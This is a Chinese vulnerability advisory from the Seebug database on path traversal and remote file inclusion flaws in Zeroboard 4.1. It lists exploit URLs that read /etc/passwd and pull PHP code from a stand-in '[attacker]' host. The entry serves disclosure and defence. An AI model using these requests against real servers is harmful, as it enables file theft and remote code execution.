Zeroboard文件泄露远程任意命令执行漏洞

2009-09-05T00:00:00
ID SSV:12210
Type seebug
Reporter Root
Modified 2009-09-05T00:00:00

Description

BUGTRAQ: 12258

Zeroboard不正确过滤用户提交的URL请求,远程攻击者可以利用这个漏洞查看系统文件内容或以进程权限执行任意命令。

Zeroboard 4.1 pl2-p15 厂商补丁: Zeroboard


目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.zeroboard.com/

                                        
                                            
                                                远程用户可以提供包含多个'../'字符的数据作为参数提交给有漏洞的脚本处理,可以WEB进程权限查看任意文件内容:
http://[target]/_head.php?_zb_path=../../../../../etc/passwd%00
http://[target]/include/write.php?dir=../../../../../etc/passwd%00
http://[target]/outlogin.php?_zb_path=../../../../../etc/passwd%00
'print_category.php'脚本没有正确过滤用户提供的'dir'参数,指定远程服务器上的任意PHP文件作为包含文件,可以WEB进程权限执行PHP命令:
http://[target]/include/print_category.php?setup[use_category]=1&dir=http://[attacker]/
另外几个zero_vote相关脚本也存在此问题,如:
http://[target]/skin/zero_vote/login.php?dir=http://[attacker]/
http://[target]/skin/zero_vote/setup.php?dir=http://[attacker]/
http://[target]/skin/zero_vote/ask_password.php?dir=http://[attacker]/